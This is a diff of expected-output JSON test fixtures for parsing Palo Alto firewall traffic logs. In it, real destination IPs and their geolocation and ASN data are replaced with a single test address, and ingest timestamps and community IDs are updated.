@@ -1289,14 +1299,14 @@ ], "ip": [ "192.168.15.224", - "172.217.2.238", + "175.16.199.1", "192.168.1.63" ] }, "event": { "duration": 15000000000, - "ingested": "2021-09-08T12:40:05.941809494Z", - "original": "Nov 30 16:09:22 PA-220 1,2018/11/30 16:09:21,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:21,192.168.15.224,172.217.2.238,192.168.1.63,172.217.2.238,new_outbound_from_trust,,,quic,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:21,23698,1,59190,443,52881,443,0x400019,udp,allow,7097,3365,3732,16,2018/11/30 16:07:04,15,any,0,32091119,0x0,192.168.0.0-192.168.255.255,United States,0,7,9,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "ingested": "2021-12-09T13:44:05.031481100Z", + "original": "Nov 30 16:09:22 PA-220 1,2018/11/30 16:09:21,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:21,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,quic,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:21,23698,1,59190,443,52881,443,0x400019,udp,allow,7097,3365,3732,16,2018/11/30 16:07:04,15,any,0,32091119,0x0,192.168.0.0-192.168.255.255,United States,0,7,9,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:21.000-05:00", "timezone": "America/New_York", "kind": "event", 
@@ -1319,27 +1329,29 @@ "destination": { "nat": { "port": 53, - "ip": "8.8.8.8" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 15169, + "number": 4837, "organization": { - "name": "Google LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 53, "bytes": 221, - "ip": "8.8.8.8", + "ip": "175.16.199.1", "packets": 1 }, "rule": { @@ -1358,7 +1370,7 @@ "packets": 1, "ip": "192.168.15.207" }, - "message": "192.168.15.207,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:22,24179,1,49728,53,26654,53,0x400019,udp,allow,301,80,221,2,2018/11/30 16:08:50,0,any,0,32091120,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "message": "192.168.15.207,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:22,24179,1,49728,53,26654,53,0x400019,udp,allow,301,80,221,2,2018/11/30 16:08:50,0,any,0,32091120,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "panw": { "panos": { "device_group_hierarchy4": "0", @@ -1373,7 +1385,7 @@ "destination": { "nat": { "port": 53, - "ip": "8.8.8.8" + "ip": "175.16.199.1" } }, "endreason": "aged-out", @@ -1395,7 +1407,7 @@ "device_group_hierarchy3": "0", "network": { "nat": { - "community_id": "1:viuINkmqZ3Q7wH9NHmhVu6rZuOs=" + "community_id": "1:T5lRauQXneZw22xJbGrCiKA4dOY=" } }, "sequence_number": 32091120, 
@@ -1415,8 +1427,8 @@ ], "network": { "community_id": [ - "1:l1lEn2QIKjwJgww02PEndRveudE=", - "1:viuINkmqZ3Q7wH9NHmhVu6rZuOs=" + "1:2J7SUgG1vsxw4i37iwcSTv8Oehg=", + "1:T5lRauQXneZw22xJbGrCiKA4dOY=" ], "transport": "udp", "application": "dns", @@ -1456,14 +1468,14 @@ ], "ip": [ "192.168.15.207", - "8.8.8.8", + "175.16.199.1", "192.168.1.63" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:40:05.941813199Z", - "original": "Nov 30 16:09:23 PA-220 1,2018/11/30 16:09:22,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:22,192.168.15.207,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:22,24179,1,49728,53,26654,53,0x400019,udp,allow,301,80,221,2,2018/11/30 16:08:50,0,any,0,32091120,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "ingested": "2021-12-09T13:44:05.031486600Z", + "original": "Nov 30 16:09:23 PA-220 1,2018/11/30 16:09:22,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:22,192.168.15.207,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:22,24179,1,49728,53,26654,53,0x400019,udp,allow,301,80,221,2,2018/11/30 16:08:50,0,any,0,32091120,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:22.000-05:00", "timezone": "America/New_York", "kind": "event", 
@@ -1486,27 +1498,29 @@ "destination": { "nat": { "port": 53, - "ip": "8.8.8.8" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 15169, + "number": 4837, "organization": { - "name": "Google LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 53, "bytes": 221, - "ip": "8.8.8.8", + "ip": "175.16.199.1", "packets": 1 }, "rule": { @@ -1525,7 +1539,7 @@ "packets": 1, "ip": "192.168.15.207" }, - "message": "192.168.15.207,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:23,23933,1,50500,53,2486,53,0x400019,udp,allow,298,77,221,2,2018/11/30 16:08:51,0,any,0,32091121,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "message": "192.168.15.207,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:23,23933,1,50500,53,2486,53,0x400019,udp,allow,298,77,221,2,2018/11/30 16:08:51,0,any,0,32091121,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "panw": { "panos": { "device_group_hierarchy4": "0", @@ -1540,7 +1554,7 @@ "destination": { "nat": { "port": 53, - "ip": "8.8.8.8" + "ip": "175.16.199.1" } }, "endreason": "aged-out", @@ -1562,7 +1576,7 @@ "device_group_hierarchy3": "0", "network": { "nat": { - "community_id": "1:wR8JpmqlhC4f7BvxdzxRlKdkPiQ=" + "community_id": "1:SU+OmGVh/EDib8CmztQBWimJutE=" } }, "sequence_number": 32091121, 
@@ -1582,8 +1596,8 @@ ], "network": { "community_id": [ - "1:RK6Ut4Rb0DTrl9IRf27cop79UwI=", - "1:wR8JpmqlhC4f7BvxdzxRlKdkPiQ=" + "1:hL1V047KcxzlTjRlyOw0JDOTtoc=", + "1:SU+OmGVh/EDib8CmztQBWimJutE=" ], "transport": "udp", "application": "dns", @@ -1623,14 +1637,14 @@ ], "ip": [ "192.168.15.207", - "8.8.8.8", + "175.16.199.1", "192.168.1.63" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:40:05.941816740Z", - "original": "Nov 30 16:09:24 PA-220 1,2018/11/30 16:09:23,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:23,192.168.15.207,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:23,23933,1,50500,53,2486,53,0x400019,udp,allow,298,77,221,2,2018/11/30 16:08:51,0,any,0,32091121,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "ingested": "2021-12-09T13:44:05.031492100Z", + "original": "Nov 30 16:09:24 PA-220 1,2018/11/30 16:09:23,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:23,192.168.15.207,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:23,23933,1,50500,53,2486,53,0x400019,udp,allow,298,77,221,2,2018/11/30 16:08:51,0,any,0,32091121,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:23.000-05:00", "timezone": "America/New_York", "kind": "event", 
@@ -1653,27 +1667,29 @@ "destination": { "nat": { "port": 443, - "ip": "17.249.60.78" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 714, + "number": 4837, "organization": { - "name": "Apple Inc." + "name": "CHINA UNICOM China169 Backbone" } }, "port": 443, "bytes": 5469, - "ip": "17.249.60.78", + "ip": "175.16.199.1", "packets": 16 }, "rule": { @@ -1692,7 +1708,7 @@ "packets": 16, "ip": "192.168.15.207" }, - "message": "192.168.15.207,17.249.60.78,192.168.1.63,17.249.60.78,new_outbound_from_trust,,,apple-push-notifications,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:24,22662,1,55112,443,42021,443,0x400053,tcp,allow,9978,4509,5469,32,2018/11/30 15:58:59,593,computer-and-internet-info,0,32091122,0x0,192.168.0.0-192.168.255.255,United States,0,16,16,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "message": "192.168.15.207,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,apple-push-notifications,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:24,22662,1,55112,443,42021,443,0x400053,tcp,allow,9978,4509,5469,32,2018/11/30 15:58:59,593,computer-and-internet-info,0,32091122,0x0,192.168.0.0-192.168.255.255,United States,0,16,16,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "panw": { "panos": { "device_group_hierarchy4": "0", @@ -1707,7 +1723,7 @@ "destination": { "nat": { "port": 443, - "ip": "17.249.60.78" + "ip": "175.16.199.1" } }, "endreason": "tcp-rst-from-client", 
@@ -1729,7 +1745,7 @@ "device_group_hierarchy3": "0", "network": { "nat": { - "community_id": "1:JuPhgq+FyomxcGW/tt851C0l4Hg=" + "community_id": "1:xz8JjcLh4ikGO6fWQgvBXZpuzII=" } }, "sequence_number": 32091122, @@ -1749,8 +1765,8 @@ ], "network": { "community_id": [ - "1:89DsXq0JlAcm8a60Q9a+OELsT0Y=", - "1:JuPhgq+FyomxcGW/tt851C0l4Hg=" + "1:DwQdRfeIqrUI2C1TANf6meOvOR0=", + "1:xz8JjcLh4ikGO6fWQgvBXZpuzII=" ], "transport": "tcp", "application": "apple-push-notifications", @@ -1790,14 +1806,14 @@ ], "ip": [ "192.168.15.207", - "17.249.60.78", + "175.16.199.1", "192.168.1.63" ] }, "event": { "duration": 593000000000, - "ingested": "2021-09-08T12:40:05.941820240Z", - "original": "Nov 30 16:09:25 PA-220 1,2018/11/30 16:09:24,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:24,192.168.15.207,17.249.60.78,192.168.1.63,17.249.60.78,new_outbound_from_trust,,,apple-push-notifications,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:24,22662,1,55112,443,42021,443,0x400053,tcp,allow,9978,4509,5469,32,2018/11/30 15:58:59,593,computer-and-internet-info,0,32091122,0x0,192.168.0.0-192.168.255.255,United States,0,16,16,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "ingested": "2021-12-09T13:44:05.031497500Z", + "original": "Nov 30 16:09:25 PA-220 1,2018/11/30 16:09:24,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:24,192.168.15.207,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,apple-push-notifications,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:24,22662,1,55112,443,42021,443,0x400053,tcp,allow,9978,4509,5469,32,2018/11/30 15:58:59,593,computer-and-internet-info,0,32091122,0x0,192.168.0.0-192.168.255.255,United States,0,16,16,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:24.000-05:00", "timezone": "America/New_York", "kind": "event", 
@@ -1820,27 +1836,29 @@ "destination": { "nat": { "port": 53, - "ip": "8.8.8.8" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 15169, + "number": 4837, "organization": { - "name": "Google LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 53, "bytes": 224, - "ip": "8.8.8.8", + "ip": "175.16.199.1", "packets": 1 }, "rule": { @@ -1859,7 +1877,7 @@ "packets": 1, "ip": "192.168.15.207" }, - "message": "192.168.15.207,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:24,24161,1,57632,53,24377,53,0x400019,udp,allow,297,73,224,2,2018/11/30 16:08:52,0,any,0,32091123,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "message": "192.168.15.207,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:24,24161,1,57632,53,24377,53,0x400019,udp,allow,297,73,224,2,2018/11/30 16:08:52,0,any,0,32091123,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "panw": { "panos": { "device_group_hierarchy4": "0", @@ -1874,7 +1892,7 @@ "destination": { "nat": { "port": 53, - "ip": "8.8.8.8" + "ip": "175.16.199.1" } }, "endreason": "aged-out", @@ -1896,7 +1914,7 @@ "device_group_hierarchy3": "0", "network": { "nat": { - "community_id": "1:rsDXUIQYGBC2VYTxep2/bVIc3Xs=" + "community_id": "1:MAu3UoFt7KzUWLymGuJkjMaPK9Q=" } }, "sequence_number": 32091123, 
@@ -1916,8 +1934,8 @@ ], "network": { "community_id": [ - "1:5lGtGtzRH+NHOqMOFVuXwxg5nCo=", - "1:rsDXUIQYGBC2VYTxep2/bVIc3Xs=" + "1:wSCOZL6w2h6wEM1XNXlcQojHrKI=", + "1:MAu3UoFt7KzUWLymGuJkjMaPK9Q=" ], "transport": "udp", "application": "dns", @@ -1957,14 +1975,14 @@ ], "ip": [ "192.168.15.207", - "8.8.8.8", + "175.16.199.1", "192.168.1.63" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:40:05.941827444Z", - "original": "Nov 30 16:09:25 PA-220 1,2018/11/30 16:09:24,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:24,192.168.15.207,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:24,24161,1,57632,53,24377,53,0x400019,udp,allow,297,73,224,2,2018/11/30 16:08:52,0,any,0,32091123,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "ingested": "2021-12-09T13:44:05.031503Z", + "original": "Nov 30 16:09:25 PA-220 1,2018/11/30 16:09:24,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:24,192.168.15.207,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:24,24161,1,57632,53,24377,53,0x400019,udp,allow,297,73,224,2,2018/11/30 16:08:52,0,any,0,32091123,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:24.000-05:00", "timezone": "America/New_York", "kind": "event", 
@@ -1987,27 +2005,29 @@ "destination": { "nat": { "port": 53, - "ip": "8.8.8.8" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 15169, + "number": 4837, "organization": { - "name": "Google LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 53, "bytes": 117, - "ip": "8.8.8.8", + "ip": "175.16.199.1", "packets": 1 }, "rule": { @@ -2026,7 +2046,7 @@ "packets": 1, "ip": "192.168.15.207" }, - "message": "192.168.15.207,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:24,24107,1,50271,53,48792,53,0x400019,udp,allow,186,69,117,2,2018/11/30 16:08:52,0,any,0,32091124,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "message": "192.168.15.207,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:24,24107,1,50271,53,48792,53,0x400019,udp,allow,186,69,117,2,2018/11/30 16:08:52,0,any,0,32091124,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "panw": { "panos": { "device_group_hierarchy4": "0", @@ -2041,7 +2061,7 @@ "destination": { "nat": { "port": 53, - "ip": "8.8.8.8" + "ip": "175.16.199.1" } }, "endreason": "aged-out", @@ -2063,7 +2083,7 @@ "device_group_hierarchy3": "0", "network": { "nat": { - "community_id": "1:ewaPydF3S4wOU8oEi8ykj+ETSIY=" + "community_id": "1:IbMAPI2u73wwPw/13/OGzLYogKE=" } }, "sequence_number": 32091124, 
@@ -2083,8 +2103,8 @@ ], "network": { "community_id": [ - "1:WbAIgVVT23pzqAJkSDF68HGSPY4=", - "1:ewaPydF3S4wOU8oEi8ykj+ETSIY=" + "1:difgeoigC1UX5MzBPcE93MzIaZA=", + "1:IbMAPI2u73wwPw/13/OGzLYogKE=" ], "transport": "udp", "application": "dns", @@ -2124,14 +2144,14 @@ ], "ip": [ "192.168.15.207", - "8.8.8.8", + "175.16.199.1", "192.168.1.63" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:40:05.941831528Z", - "original": "Nov 30 16:09:25 PA-220 1,2018/11/30 16:09:24,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:24,192.168.15.207,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:24,24107,1,50271,53,48792,53,0x400019,udp,allow,186,69,117,2,2018/11/30 16:08:52,0,any,0,32091124,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "ingested": "2021-12-09T13:44:05.031508400Z", + "original": "Nov 30 16:09:25 PA-220 1,2018/11/30 16:09:24,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:24,192.168.15.207,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:24,24107,1,50271,53,48792,53,0x400019,udp,allow,186,69,117,2,2018/11/30 16:08:52,0,any,0,32091124,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:24.000-05:00", "timezone": "America/New_York", "kind": "event", 
@@ -2154,27 +2174,29 @@ "destination": { "nat": { "port": 53, - "ip": "8.8.8.8" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 15169, + "number": 4837, "organization": { - "name": "Google LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 53, "bytes": 307, - "ip": "8.8.8.8", + "ip": "175.16.199.1", "packets": 1 }, "rule": { @@ -2193,7 +2215,7 @@ "packets": 1, "ip": "192.168.15.207" }, - "message": "192.168.15.207,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:24,24063,1,54061,53,2987,53,0x400019,udp,allow,392,85,307,2,2018/11/30 16:08:52,0,any,0,32091125,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "message": "192.168.15.207,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:24,24063,1,54061,53,2987,53,0x400019,udp,allow,392,85,307,2,2018/11/30 16:08:52,0,any,0,32091125,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "panw": { "panos": { "device_group_hierarchy4": "0", @@ -2208,7 +2230,7 @@ "destination": { "nat": { "port": 53, - "ip": "8.8.8.8" + "ip": "175.16.199.1" } }, "endreason": "aged-out", @@ -2230,7 +2252,7 @@ "device_group_hierarchy3": "0", "network": { "nat": { - "community_id": "1:+6FjOLCCWY+JDxSWKn7tYpAXksA=" + "community_id": "1:gyqXSPK4UfpIaavm5ElvzpaQJAs=" } }, "sequence_number": 32091125, 
@@ -2250,8 +2272,8 @@ ], "network": { "community_id": [ - "1:b+lWViOjpbOZConz3JzrSDR609Q=", - "1:+6FjOLCCWY+JDxSWKn7tYpAXksA=" + "1:rukFlCTeT6g0aD5WOkvZ1QaFQrQ=", + "1:gyqXSPK4UfpIaavm5ElvzpaQJAs=" ], "transport": "udp", "application": "dns", @@ -2291,14 +2313,14 @@ ], "ip": [ "192.168.15.207", - "8.8.8.8", + "175.16.199.1", "192.168.1.63" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:40:05.941835130Z", - "original": "Nov 30 16:09:25 PA-220 1,2018/11/30 16:09:24,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:24,192.168.15.207,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:24,24063,1,54061,53,2987,53,0x400019,udp,allow,392,85,307,2,2018/11/30 16:08:52,0,any,0,32091125,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "ingested": "2021-12-09T13:44:05.031513800Z", + "original": "Nov 30 16:09:25 PA-220 1,2018/11/30 16:09:24,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:24,192.168.15.207,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:24,24063,1,54061,53,2987,53,0x400019,udp,allow,392,85,307,2,2018/11/30 16:08:52,0,any,0,32091125,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:24.000-05:00", "timezone": "America/New_York", "kind": "event", 
@@ -2321,27 +2343,29 @@ "destination": { "nat": { "port": 53, - "ip": "8.8.8.8" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 15169, + "number": 4837, "organization": { - "name": "Google LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 53, "bytes": 365, - "ip": "8.8.8.8", + "ip": "175.16.199.1", "packets": 1 }, "rule": { @@ -2360,7 +2384,7 @@ "packets": 1, "ip": "192.168.15.207" }, - "message": "192.168.15.207,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:24,24145,1,52701,53,6945,53,0x400019,udp,allow,440,75,365,2,2018/11/30 16:08:52,0,any,0,32091126,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "message": "192.168.15.207,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:24,24145,1,52701,53,6945,53,0x400019,udp,allow,440,75,365,2,2018/11/30 16:08:52,0,any,0,32091126,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "panw": { "panos": { "device_group_hierarchy4": "0", @@ -2375,7 +2399,7 @@ "destination": { "nat": { "port": 53, - "ip": "8.8.8.8" + "ip": "175.16.199.1" } }, "endreason": "aged-out", @@ -2397,7 +2421,7 @@ "device_group_hierarchy3": "0", "network": { "nat": { - "community_id": "1:rR5F8eZHI1nwmznedxqG9e8vUQE=" + "community_id": "1:TG8yX3XeuNWXzsGRmRkB5EraqBM=" } }, "sequence_number": 32091126, 
@@ -2417,8 +2441,8 @@ ], "network": { "community_id": [ - "1:dnGaTG13rwIh66+Pj0GQSdJMhu8=", - "1:rR5F8eZHI1nwmznedxqG9e8vUQE=" + "1:DPokRa42hI+2E3a2DWdKPltL/Hs=", + "1:TG8yX3XeuNWXzsGRmRkB5EraqBM=" ], "transport": "udp", "application": "dns", @@ -2458,14 +2482,14 @@ ], "ip": [ "192.168.15.207", - "8.8.8.8", + "175.16.199.1", "192.168.1.63" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:40:05.941838611Z", - "original": "Nov 30 16:09:25 PA-220 1,2018/11/30 16:09:24,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:24,192.168.15.207,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:24,24145,1,52701,53,6945,53,0x400019,udp,allow,440,75,365,2,2018/11/30 16:08:52,0,any,0,32091126,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "ingested": "2021-12-09T13:44:05.031519200Z", + "original": "Nov 30 16:09:25 PA-220 1,2018/11/30 16:09:24,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:24,192.168.15.207,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:24,24145,1,52701,53,6945,53,0x400019,udp,allow,440,75,365,2,2018/11/30 16:08:52,0,any,0,32091126,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:24.000-05:00", "timezone": "America/New_York", "kind": "event", 
